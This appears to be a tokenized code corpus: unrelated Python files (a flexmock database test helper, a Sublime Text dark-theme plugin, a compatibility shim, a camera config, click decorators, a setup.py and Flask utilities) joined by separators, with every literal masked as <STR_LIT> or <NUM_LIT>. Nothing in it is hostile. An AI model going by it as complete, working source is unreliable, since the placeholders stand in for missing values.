</s>
<s> from flexmock import flexmock <EOL> from framework . db . db import DB <EOL> import framework . db . db_handler as db_handler <EOL> from collections import defaultdict <EOL> from framework . lib import general <EOL> class DBEnvironmentBuilder ( ) : <EOL> def build ( self ) : <EOL> self . _create_core_mock ( ) <EOL> db = flexmock ( DB ( self . core_mock ) ) <EOL> flexmock ( db . DBHandler ) <EOL> db . DBHandler . should_receive ( "<STR_LIT>" ) <EOL> db . DBHandler . Storage [ '<STR_LIT>' ] = { "<STR_LIT>" : { '<STR_LIT>' : [ ] , '<STR_LIT>' : <NUM_LIT:0> } } <EOL> db . DBHandler . GetDBNames_old = db . DBHandler . GetDBNames <EOL> db . DBHandler . should_receive ( "<STR_LIT>" ) . and_return ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> general . INCOMING_QUEUE_TO_DIR_MAPPING = defaultdict ( list ) <EOL> general . OUTGOING_QUEUE_TO_DIR_MAPPING = defaultdict ( list ) <EOL> self . core_mock . DB = db <EOL> return db <EOL> def _create_core_mock ( self ) : <EOL> self . core_mock = flexmock ( ) <EOL> self . core_mock . Config = flexmock ( ) <EOL> self . core_mock . Config . should_receive ( "<STR_LIT>" ) . and_return ( [ "<STR_LIT:path>" ] ) <EOL> def fake_get ( key ) : <EOL> values = { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:path>" } <EOL> return values [ key ] <EOL> self . core_mock . Config . Get = fake_get </s>
<s> import sublime , sublime_plugin <EOL> import subprocess <EOL> import re <EOL> class GTKDarkThemeVariantSetter ( sublime_plugin . EventListener ) : <EOL> def get_output_matches ( self , arguments , pattern ) : <EOL> output = subprocess . Popen ( arguments , stdout = subprocess . PIPE ) . communicate ( ) [ <NUM_LIT:0> ] <EOL> return re . findall ( pattern , output . decode ( "<STR_LIT:utf-8>" ) ) <EOL> def get_sublime_pids ( self ) : <EOL> return self . get_output_matches ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def get_window_ids ( self ) : <EOL> return self . get_output_matches ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def get_pid_from_window_id ( self , window_id ) : <EOL> return self . get_output_matches ( [ "<STR_LIT>" , "<STR_LIT>" , window_id , "<STR_LIT>" ] , "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> def set_dark_theme ( self , window_id ) : <EOL> subprocess . call ( [ "<STR_LIT>" , "<STR_LIT>" , window_id , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def on_activated ( self , view ) : <EOL> sublime_pids = self . get_sublime_pids ( ) <EOL> for window_id in self . get_window_ids ( ) : <EOL> if self . get_pid_from_window_id ( window_id ) in sublime_pids : <EOL> self . set_dark_theme ( window_id ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT:int>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> import sys <EOL> PY3 = sys . version_info >= ( <NUM_LIT:3> , ) <EOL> try : <EOL> import __builtin__ <EOL> except ImportError : <EOL> import builtins as __builtin__ <EOL> if PY3 : <EOL> int = int <EOL> long = int <EOL> xrange = range <EOL> exec_ = getattr ( __builtin__ , "<STR_LIT>" ) <EOL> print_ = getattr ( __builtin__ , "<STR_LIT>" ) <EOL> else : <EOL> int = int <EOL> long = long <EOL> xrange = xrange <EOL> def exec_ ( code , globs = None , locs = None ) : <EOL> if globs is None : <EOL> frame = _sys . _getframe ( <NUM_LIT:1> ) <EOL> globs = frame . f_globals <EOL> if locs is None : <EOL> locs = frame . f_locals <EOL> del frame <EOL> elif locs is None : <EOL> locs = globs <EOL> exec ( """<STR_LIT>""" ) <EOL> def print_ ( s ) : <EOL> sys . stdout . write ( s + '<STR_LIT:\n>' ) <EOL> sys . stdout . flush ( ) <EOL> try : <EOL> callable = callable <EOL> except Exception : <EOL> def callable ( obj ) : <EOL> for klass in type ( obj ) . __mro__ : <EOL> if "<STR_LIT>" in klass . __dict__ : <EOL> return True <EOL> return False <EOL> try : <EOL> from collections import namedtuple <EOL> except ImportError : <EOL> from operator import itemgetter as _itemgetter <EOL> from keyword import iskeyword as _iskeyword <EOL> import sys as _sys <EOL> def namedtuple ( typename , field_names , verbose = False , rename = False ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( field_names , basestring ) : <EOL> field_names = field_names . replace ( '<STR_LIT:U+002C>' , '<STR_LIT:U+0020>' ) . split ( ) <EOL> field_names = tuple ( map ( str , field_names ) ) <EOL> if rename : <EOL> names = list ( field_names ) <EOL> seen = set ( ) <EOL> for i , name in enumerate ( names ) : <EOL> if ( not min ( c . isalnum ( ) or c == '<STR_LIT:_>' for c in name ) or _iskeyword ( name ) <EOL> or not name or name [ <NUM_LIT:0> ] . isdigit ( ) or name . startswith ( '<STR_LIT:_>' ) <EOL> or name in seen ) : <EOL> names [ i ] = '<STR_LIT>' % i <EOL> seen . add ( name ) <EOL> field_names = tuple ( names ) <EOL> for name in ( typename , ) + field_names : <EOL> if not min ( c . isalnum ( ) or c == '<STR_LIT:_>' for c in name ) : <EOL> raise ValueError ( '<STR_LIT>' '<STR_LIT>' <EOL> % name ) <EOL> if _iskeyword ( name ) : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> if name [ <NUM_LIT:0> ] . isdigit ( ) : <EOL> raise ValueError ( '<STR_LIT>' '<STR_LIT>' % name ) <EOL> seen_names = set ( ) <EOL> for name in field_names : <EOL> if name . startswith ( '<STR_LIT:_>' ) and not rename : <EOL> raise ValueError ( '<STR_LIT>' <EOL> % name ) <EOL> if name in seen_names : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> seen_names . add ( name ) <EOL> numfields = len ( field_names ) <EOL> argtxt = repr ( field_names ) . replace ( "<STR_LIT:'>" , "<STR_LIT>" ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> reprtxt = '<STR_LIT:U+002CU+0020>' . join ( '<STR_LIT>' % name for name in field_names ) <EOL> template = '''<STR_LIT>''' % locals ( ) <EOL> for i , name in enumerate ( field_names ) : <EOL> template += '<STR_LIT>' % ( name , i ) <EOL> if verbose : <EOL> sys . stdout . write ( template + '<STR_LIT:\n>' ) <EOL> sys . stdout . flush ( ) <EOL> namespace = dict ( _itemgetter = _itemgetter , __name__ = '<STR_LIT>' % typename , <EOL> _property = property , _tuple = tuple ) <EOL> try : <EOL> exec_ ( template , namespace ) <EOL> except SyntaxError : <EOL> e = sys . exc_info ( ) [ <NUM_LIT:1> ] <EOL> raise SyntaxError ( e . message + '<STR_LIT>' + template ) <EOL> result = namespace [ typename ] <EOL> try : <EOL> result . __module__ = _sys . _getframe ( <NUM_LIT:1> ) . f_globals . get ( '<STR_LIT>' , '<STR_LIT:__main__>' ) <EOL> except ( AttributeError , ValueError ) : <EOL> pass <EOL> return result <EOL> if hasattr ( property , '<STR_LIT>' ) : <EOL> property = property <EOL> else : <EOL> class property ( __builtin__ . property ) : <EOL> __metaclass__ = type <EOL> def __init__ ( self , fget , * args , ** kwargs ) : <EOL> super ( property , self ) . __init__ ( fget , * args , ** kwargs ) <EOL> self . __doc__ = fget . __doc__ <EOL> def getter ( self , method ) : <EOL> return property ( method , self . fset , self . fdel ) <EOL> def setter ( self , method ) : <EOL> return property ( self . fget , method , self . fdel ) <EOL> def deleter ( self , method ) : <EOL> return property ( self . fget , self . fset , method ) <EOL> try : <EOL> from collections import defaultdict <EOL> except ImportError : <EOL> class defaultdict ( dict ) : <EOL> def __init__ ( self , default_factory = None , * a , ** kw ) : <EOL> if ( default_factory is not None and <EOL> not hasattr ( default_factory , '<STR_LIT>' ) ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> dict . __init__ ( self , * a , ** kw ) <EOL> self . default_factory = default_factory <EOL> def __getitem__ ( self , key ) : <EOL> try : <EOL> return dict . __getitem__ ( self , key ) <EOL> except KeyError : <EOL> return self . __missing__ ( key ) <EOL> def __missing__ ( self , key ) : <EOL> if self . default_factory is None : <EOL> raise KeyError ( key ) <EOL> self [ key ] = value = self . default_factory ( ) <EOL> return value <EOL> def __reduce__ ( self ) : <EOL> if self . default_factory is None : <EOL> args = tuple ( ) <EOL> else : <EOL> args = self . default_factory , <EOL> return type ( self ) , args , None , None , self . items ( ) <EOL> def copy ( self ) : <EOL> return self . __copy__ ( ) <EOL> def __copy__ ( self ) : <EOL> return type ( self ) ( self . default_factory , self ) <EOL> def __deepcopy__ ( self , memo ) : <EOL> import copy <EOL> return type ( self ) ( self . default_factory , <EOL> copy . deepcopy ( self . items ( ) ) ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . default_factory , <EOL> dict . __repr__ ( self ) ) <EOL> try : <EOL> from functools import wraps <EOL> except ImportError : <EOL> def wraps ( original ) : <EOL> def inner ( fn ) : <EOL> for attribute in [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] : <EOL> setattr ( fn , attribute , getattr ( original , attribute ) ) <EOL> for attribute in [ '<STR_LIT>' , <EOL> ] : <EOL> if hasattr ( fn , attribute ) : <EOL> getattr ( fn , attribute ) . update ( getattr ( original , attribute ) ) <EOL> else : <EOL> setattr ( fn , attribute , <EOL> getattr ( original , attribute ) . copy ( ) ) <EOL> return fn <EOL> return inner </s>
<s> configTitle = "<STR_LIT>" <EOL> configName = "<STR_LIT>" <EOL> verbose = True <EOL> logDataToFile = False <EOL> debug = False <EOL> imageTestPrint = False <EOL> imageNamePrefix = '<STR_LIT>' <EOL> imageWidth = <NUM_LIT> <EOL> imageHeight = <NUM_LIT> <EOL> imageVFlip = False <EOL> imageHFlip = False <EOL> imagePreview = False <EOL> noNightShots = False <EOL> noDayShots = False <EOL> nightMaxShut = <NUM_LIT> <EOL> nightMinShut = <NUM_LIT> <EOL> nightMaxISO = <NUM_LIT> <EOL> nightMinISO = <NUM_LIT:100> <EOL> nightSleepSec = <NUM_LIT:10> <EOL> twilightThreshold = <NUM_LIT:50> <EOL> showDateOnImage = True <EOL> showTextFontSize = <NUM_LIT> <EOL> showTextBottom = True <EOL> showTextWhite = True <EOL> showTextWhiteNight = True <EOL> motionOn = True <EOL> motionPrefix = "<STR_LIT>" <EOL> motionDir = "<STR_LIT>" <EOL> threshold = <NUM_LIT:10> <EOL> sensitivity = <NUM_LIT:200> <EOL> motionVideoOn = False <EOL> motionVideoTimer = <NUM_LIT:10> <EOL> motionQuickTLOn = False <EOL> motionQuickTLTimer = <NUM_LIT:10> <EOL> motionQuickTLInterval = <NUM_LIT:0> <EOL> motionForce = <NUM_LIT> * <NUM_LIT> <EOL> motionNumOn = True <EOL> motionNumStart = <NUM_LIT:1000> <EOL> motionNumMax = <NUM_LIT> <EOL> motionNumRecycle = True <EOL> motionMaxDots = <NUM_LIT:100> <EOL> createLockFile = True <EOL> timelapseOn = False <EOL> timelapseTimer = <NUM_LIT:5> * <NUM_LIT> <EOL> timelapseDir = "<STR_LIT>" <EOL> timelapsePrefix = "<STR_LIT>" <EOL> timelapseExit = <NUM_LIT:0> * <NUM_LIT> <EOL> timelapseNumOn = True <EOL> timelapseNumStart = <NUM_LIT:1000> <EOL> timelapseNumMax = <NUM_LIT> <EOL> timelapseNumRecycle = True </s>
<s> import sys <EOL> import inspect <EOL> from functools import update_wrapper <EOL> from . _compat import iteritems <EOL> from . _unicodefun import _check_for_unicode_literals <EOL> from . utils import echo <EOL> from . globals import get_current_context <EOL> def pass_context ( f ) : <EOL> """<STR_LIT>""" <EOL> def new_func ( * args , ** kwargs ) : <EOL> return f ( get_current_context ( ) , * args , ** kwargs ) <EOL> return update_wrapper ( new_func , f ) <EOL> def pass_obj ( f ) : <EOL> """<STR_LIT>""" <EOL> def new_func ( * args , ** kwargs ) : <EOL> return f ( get_current_context ( ) . obj , * args , ** kwargs ) <EOL> return update_wrapper ( new_func , f ) <EOL> def make_pass_decorator ( object_type , ensure = False ) : <EOL> """<STR_LIT>""" <EOL> def decorator ( f ) : <EOL> def new_func ( * args , ** kwargs ) : <EOL> ctx = get_current_context ( ) <EOL> if ensure : <EOL> obj = ctx . ensure_object ( object_type ) <EOL> else : <EOL> obj = ctx . find_object ( object_type ) <EOL> if obj is None : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % object_type . __name__ ) <EOL> return ctx . invoke ( f , obj , * args [ <NUM_LIT:1> : ] , ** kwargs ) <EOL> return update_wrapper ( new_func , f ) <EOL> return decorator <EOL> def _make_command ( f , name , attrs , cls ) : <EOL> if isinstance ( f , Command ) : <EOL> raise TypeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> try : <EOL> params = f . __click_params__ <EOL> params . reverse ( ) <EOL> del f . __click_params__ <EOL> except AttributeError : <EOL> params = [ ] <EOL> help = attrs . get ( '<STR_LIT>' ) <EOL> if help is None : <EOL> help = inspect . getdoc ( f ) <EOL> if isinstance ( help , bytes ) : <EOL> help = help . decode ( '<STR_LIT:utf-8>' ) <EOL> else : <EOL> help = inspect . cleandoc ( help ) <EOL> attrs [ '<STR_LIT>' ] = help <EOL> _check_for_unicode_literals ( ) <EOL> return cls ( name = name or f . __name__ . lower ( ) , <EOL> callback = f , params = params , ** attrs ) <EOL> def command ( name = None , cls = None , ** attrs ) : <EOL> """<STR_LIT>""" <EOL> if cls is None : <EOL> cls = Command <EOL> def decorator ( f ) : <EOL> cmd = _make_command ( f , name , attrs , cls ) <EOL> cmd . __doc__ = f . __doc__ <EOL> return cmd <EOL> return decorator <EOL> def group ( name = None , ** attrs ) : <EOL> """<STR_LIT>""" <EOL> attrs . setdefault ( '<STR_LIT>' , Group ) <EOL> return command ( name , ** attrs ) <EOL> def _param_memo ( f , param ) : <EOL> if isinstance ( f , Command ) : <EOL> f . params . append ( param ) <EOL> else : <EOL> if not hasattr ( f , '<STR_LIT>' ) : <EOL> f . __click_params__ = [ ] <EOL> f . __click_params__ . append ( param ) <EOL> def argument ( * param_decls , ** attrs ) : <EOL> """<STR_LIT>""" <EOL> def decorator ( f ) : <EOL> ArgumentClass = attrs . pop ( '<STR_LIT>' , Argument ) <EOL> _param_memo ( f , ArgumentClass ( param_decls , ** attrs ) ) <EOL> return f <EOL> return decorator <EOL> def option ( * param_decls , ** attrs ) : <EOL> """<STR_LIT>""" <EOL> def decorator ( f ) : <EOL> if '<STR_LIT>' in attrs : <EOL> attrs [ '<STR_LIT>' ] = inspect . cleandoc ( attrs [ '<STR_LIT>' ] ) <EOL> OptionClass = attrs . pop ( '<STR_LIT>' , Option ) <EOL> _param_memo ( f , OptionClass ( param_decls , ** attrs ) ) <EOL> return f <EOL> return decorator <EOL> def confirmation_option ( * param_decls , ** attrs ) : <EOL> """<STR_LIT>""" <EOL> def decorator ( f ) : <EOL> def callback ( ctx , param , value ) : <EOL> if not value : <EOL> ctx . abort ( ) <EOL> attrs . setdefault ( '<STR_LIT>' , True ) <EOL> attrs . setdefault ( '<STR_LIT>' , callback ) <EOL> attrs . setdefault ( '<STR_LIT>' , False ) <EOL> attrs . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> attrs . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return option ( * ( param_decls or ( '<STR_LIT>' , ) ) , ** attrs ) ( f ) <EOL> return decorator <EOL> def password_option ( * param_decls , ** attrs ) : <EOL> """<STR_LIT>""" <EOL> def decorator ( f ) : <EOL> attrs . setdefault ( '<STR_LIT>' , True ) <EOL> attrs . setdefault ( '<STR_LIT>' , True ) <EOL> attrs . setdefault ( '<STR_LIT>' , True ) <EOL> return option ( * ( param_decls or ( '<STR_LIT>' , ) ) , ** attrs ) ( f ) <EOL> return decorator <EOL> def version_option ( version = None , * param_decls , ** attrs ) : <EOL> """<STR_LIT>""" <EOL> if version is None : <EOL> module = sys . _getframe ( <NUM_LIT:1> ) . f_globals . get ( '<STR_LIT>' ) <EOL> def decorator ( f ) : <EOL> prog_name = attrs . pop ( '<STR_LIT>' , None ) <EOL> message = attrs . pop ( '<STR_LIT:message>' , '<STR_LIT>' ) <EOL> def callback ( ctx , param , value ) : <EOL> if not value or ctx . resilient_parsing : <EOL> return <EOL> prog = prog_name <EOL> if prog is None : <EOL> prog = ctx . find_root ( ) . info_name <EOL> ver = version <EOL> if ver is None : <EOL> try : <EOL> import pkg_resources <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> for dist in pkg_resources . working_set : <EOL> scripts = dist . get_entry_map ( ) . get ( '<STR_LIT>' ) or { } <EOL> for script_name , entry_point in iteritems ( scripts ) : <EOL> if entry_point . module_name == module : <EOL> ver = dist . version <EOL> break <EOL> if ver is None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> echo ( message % { <EOL> '<STR_LIT>' : prog , <EOL> '<STR_LIT:version>' : ver , <EOL> } , color = ctx . color ) <EOL> ctx . exit ( ) <EOL> attrs . setdefault ( '<STR_LIT>' , True ) <EOL> attrs . setdefault ( '<STR_LIT>' , False ) <EOL> attrs . setdefault ( '<STR_LIT>' , True ) <EOL> attrs . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> attrs [ '<STR_LIT>' ] = callback <EOL> return option ( * ( param_decls or ( '<STR_LIT>' , ) ) , ** attrs ) ( f ) <EOL> return decorator <EOL> def help_option ( * param_decls , ** attrs ) : <EOL> """<STR_LIT>""" <EOL> def decorator ( f ) : <EOL> def callback ( ctx , param , value ) : <EOL> if value and not ctx . resilient_parsing : <EOL> echo ( ctx . get_help ( ) , color = ctx . color ) <EOL> ctx . exit ( ) <EOL> attrs . setdefault ( '<STR_LIT>' , True ) <EOL> attrs . setdefault ( '<STR_LIT>' , False ) <EOL> attrs . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> attrs . setdefault ( '<STR_LIT>' , True ) <EOL> attrs [ '<STR_LIT>' ] = callback <EOL> return option ( * ( param_decls or ( '<STR_LIT>' , ) ) , ** attrs ) ( f ) <EOL> return decorator <EOL> from . core import Command , Group , Argument , Option </s>
<s> from setuptools import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT:1.0>' , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> include_package_data = True , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> entry_points = '''<STR_LIT>''' , <EOL> ) </s>
<s> import re <EOL> import creoleparser <EOL> from datetime import datetime , timedelta <EOL> from genshi import builder <EOL> from functools import wraps <EOL> from creoleparser . elements import PreBlock <EOL> from pygments import highlight <EOL> from pygments . formatters import HtmlFormatter <EOL> from pygments . lexers import get_lexer_by_name <EOL> from pygments . util import ClassNotFound <EOL> from flask import g , url_for , flash , abort , request , redirect , Markup <EOL> from flask_website . flaskystyle import FlaskyStyle <EOL> pygments_formatter = HtmlFormatter ( style = FlaskyStyle ) <EOL> _ws_split_re = re . compile ( r'<STR_LIT>' ) <EOL> TIMEDELTA_UNITS = ( <EOL> ( '<STR_LIT>' , <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> * <NUM_LIT> * <NUM_LIT:30> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> * <NUM_LIT> * <NUM_LIT:7> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> * <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> ) <EOL> class CodeBlock ( PreBlock ) : <EOL> def __init__ ( self ) : <EOL> super ( CodeBlock , self ) . __init__ ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def _build ( self , mo , element_store , environ ) : <EOL> lines = self . regexp2 . sub ( r'<STR_LIT>' , mo . group ( <NUM_LIT:1> ) ) . splitlines ( ) <EOL> if lines and lines [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> try : <EOL> lexer = get_lexer_by_name ( lines . pop ( <NUM_LIT:0> ) [ <NUM_LIT:2> : ] . strip ( ) ) <EOL> except ClassNotFound : <EOL> pass <EOL> else : <EOL> return Markup ( highlight ( u'<STR_LIT:\n>' . join ( lines ) , lexer , <EOL> pygments_formatter ) ) <EOL> return builder . tag . pre ( u'<STR_LIT:\n>' . join ( lines ) ) <EOL> custom_dialect = creoleparser . create_dialect ( creoleparser . creole10_base ) <EOL> custom_dialect . img = custom_dialect . no_wiki <EOL> custom_dialect . pre = CodeBlock ( ) <EOL> _parser = creoleparser . Parser ( <EOL> dialect = custom_dialect , <EOL> method = '<STR_LIT:html>' <EOL> ) <EOL> def format_creole ( text ) : <EOL> return Markup ( _parser . render ( text , encoding = None ) ) <EOL> def split_lines_wrapping ( text , width = <NUM_LIT> , threshold = <NUM_LIT> ) : <EOL> lines = text . splitlines ( ) <EOL> if all ( len ( line ) <= threshold for line in lines ) : <EOL> return lines <EOL> result = [ ] <EOL> for line in lines : <EOL> if len ( line ) <= threshold : <EOL> result . append ( line ) <EOL> continue <EOL> line_width = <NUM_LIT:0> <EOL> line_buffer = [ ] <EOL> for piece in _ws_split_re . split ( line ) : <EOL> line_width += len ( piece ) <EOL> if line_width > width : <EOL> result . append ( u'<STR_LIT>' . join ( line_buffer ) ) <EOL> line_buffer = [ ] <EOL> if not piece . isspace ( ) : <EOL> line_buffer . append ( piece ) <EOL> line_width = len ( piece ) <EOL> else : <EOL> line_width = <NUM_LIT:0> <EOL> else : <EOL> line_buffer . append ( piece ) <EOL> if line_buffer : <EOL> result . append ( u'<STR_LIT>' . join ( line_buffer ) ) <EOL> return result <EOL> def request_wants_json ( ) : <EOL> best = request . accept_mimetypes . best_match ( [ '<STR_LIT:application/json>' , '<STR_LIT>' ] ) <EOL> return best == '<STR_LIT:application/json>' and request . accept_mimetypes [ best ] > request . accept_mimetypes [ '<STR_LIT>' ] <EOL> def requires_login ( f ) : <EOL> @ wraps ( f ) <EOL> def decorated_function ( * args , ** kwargs ) : <EOL> if g . user is None : <EOL> flash ( u'<STR_LIT>' ) <EOL> return redirect ( url_for ( '<STR_LIT>' , next = request . path ) ) <EOL> return f ( * args , ** kwargs ) <EOL> return decorated_function <EOL> def requires_admin ( f ) : <EOL> @ wraps ( f ) <EOL> def decorated_function ( * args , ** kwargs ) : <EOL> if not g . user . is_admin : <EOL> abort ( <NUM_LIT> ) <EOL> return f ( * args , ** kwargs ) <EOL> return requires_login ( decorated_function ) <EOL> def format_datetime ( dt ) : <EOL> return dt . strftime ( '<STR_LIT>' ) <EOL> def format_date ( dt ) : <EOL> return dt . strftime ( '<STR_LIT>' ) <EOL> def format_timedelta ( delta , granularity = '<STR_LIT>' , threshold = <NUM_LIT> ) : <EOL> if isinstance ( delta , datetime ) : <EOL> delta = datetime . utcnow ( ) - delta <EOL> if isinstance ( delta , timedelta ) : <EOL> seconds = int ( ( delta . days * <NUM_LIT> ) + delta . seconds ) <EOL> else : <EOL> seconds = delta <EOL> for unit , secs_per_unit in TIMEDELTA_UNITS : <EOL> value = abs ( seconds ) / secs_per_unit <EOL> if value >= threshold or unit == granularity : <EOL> if unit == granularity and value > <NUM_LIT:0> : <EOL> value = max ( <NUM_LIT:1> , value ) <EOL> value = int ( round ( value ) ) <EOL> rv = u'<STR_LIT>' % ( value , unit ) <EOL> if value != <NUM_LIT:1> : <EOL> rv += u'<STR_LIT:s>' <EOL> return rv <EOL> return u'<STR_LIT>' <EOL> def display_openid ( openid ) : <EOL> if not openid : <EOL> return '<STR_LIT>' <EOL> rv = openid <EOL> if rv . startswith ( ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> rv = rv . split ( '<STR_LIT:/>' , <NUM_LIT:2> ) [ - <NUM_LIT:1> ] <EOL> return rv . rstrip ( '<STR_LIT:/>' ) </s>
<s> """<STR_LIT>""" <EOL> from . _compat import implements_to_string , text_type <EOL> from . app import Flask <EOL> from . blueprints import Blueprint <EOL> from . globals import _request_ctx_stack <EOL> class UnexpectedUnicodeError ( AssertionError , UnicodeError ) : <EOL> """<STR_LIT>""" <EOL> @ implements_to_string <EOL> class DebugFilesKeyError ( KeyError , AssertionError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , request , key ) : <EOL> form_matches = request . form . getlist ( key ) <EOL> buf = [ '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( key , request . mimetype ) ] <EOL> if form_matches : <EOL> buf . append ( '<STR_LIT>' <EOL> '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( '<STR_LIT>' % x <EOL> for x in form_matches ) ) <EOL> self . msg = '<STR_LIT>' . join ( buf ) <EOL> def __str__ ( self ) : <EOL> return self . msg <EOL> class FormDataRoutingRedirect ( AssertionError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , request ) : <EOL> exc = request . routing_exception <EOL> buf = [ '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( request . url , exc . new_url ) ] <EOL> if request . base_url + '<STR_LIT:/>' == exc . new_url . split ( '<STR_LIT:?>' ) [ <NUM_LIT:0> ] : <EOL> buf . append ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> buf . append ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> request . method ) <EOL> buf . append ( '<STR_LIT>' ) <EOL> AssertionError . __init__ ( self , '<STR_LIT>' . join ( buf ) . encode ( '<STR_LIT:utf-8>' ) ) <EOL> def attach_enctype_error_multidict ( request ) : <EOL> """<STR_LIT>""" <EOL> oldcls = request . files . __class__ <EOL> class newcls ( oldcls ) : <EOL> def __getitem__ ( self , key ) : <EOL> try : <EOL> return oldcls . __getitem__ ( self , key ) <EOL> except KeyError : <EOL> if key not in request . form : <EOL> raise <EOL> raise DebugFilesKeyError ( request , key ) <EOL> newcls . __name__ = oldcls . __name__ <EOL> newcls . __module__ = oldcls . __module__ <EOL> request . files . __class__ = newcls <EOL> def _dump_loader_info ( loader ) : <EOL> yield '<STR_LIT>' % ( type ( loader ) . __module__ , type ( loader ) . __name__ ) <EOL> for key , value in sorted ( loader . __dict__ . items ( ) ) : <EOL> if key . startswith ( '<STR_LIT:_>' ) : <EOL> continue <EOL> if isinstance ( value , ( tuple , list ) ) : <EOL> if not all ( isinstance ( x , ( str , text_type ) ) for x in value ) : <EOL> continue <EOL> yield '<STR_LIT>' % key <EOL> for item in value : <EOL> yield '<STR_LIT>' % item <EOL> continue <EOL> elif not isinstance ( value , ( str , text_type , int , float , bool ) ) : <EOL> continue <EOL> yield '<STR_LIT>' % ( key , value ) <EOL> def explain_template_loading_attempts ( app , template , attempts ) : <EOL> """<STR_LIT>""" <EOL> info = [ '<STR_LIT>' % template ] <EOL> total_found = <NUM_LIT:0> <EOL> blueprint = None <EOL> reqctx = _request_ctx_stack . top <EOL> if reqctx is not None and reqctx . request . blueprint is not None : <EOL> blueprint = reqctx . request . blueprint <EOL> for idx , ( loader , srcobj , triple ) in enumerate ( attempts ) : <EOL> if isinstance ( srcobj , Flask ) : <EOL> src_info = '<STR_LIT>' % srcobj . import_name <EOL> elif isinstance ( srcobj , Blueprint ) : <EOL> src_info = '<STR_LIT>' % ( srcobj . name , <EOL> srcobj . import_name ) <EOL> else : <EOL> src_info = repr ( srcobj ) <EOL> info . append ( '<STR_LIT>' % ( <EOL> idx + <NUM_LIT:1> , src_info ) ) <EOL> for line in _dump_loader_info ( loader ) : <EOL> info . append ( '<STR_LIT>' % line ) <EOL> if triple is None : <EOL> detail = '<STR_LIT>' <EOL> else : <EOL> detail = '<STR_LIT>' % ( triple [ <NUM_LIT:1> ] or '<STR_LIT>' ) <EOL> total_found += <NUM_LIT:1> <EOL> info . append ( '<STR_LIT>' % detail ) <EOL> seems_fishy = False <EOL> if total_found == <NUM_LIT:0> : <EOL> info . append ( '<STR_LIT>' ) <EOL> seems_fishy = True <EOL> elif total_found > <NUM_LIT:1> : <EOL> info . append ( '<STR_LIT>' ) <EOL> seems_fishy = True <EOL> if blueprint is not None and seems_fishy : <EOL> info . append ( '<STR_LIT>' <EOL> '<STR_LIT>' % blueprint ) <EOL> info . append ( '<STR_LIT>' ) <EOL> info . append ( '<STR_LIT>' ) <EOL> app . logger . info ( '<STR_LIT:\n>' . join ( info ) ) </s>
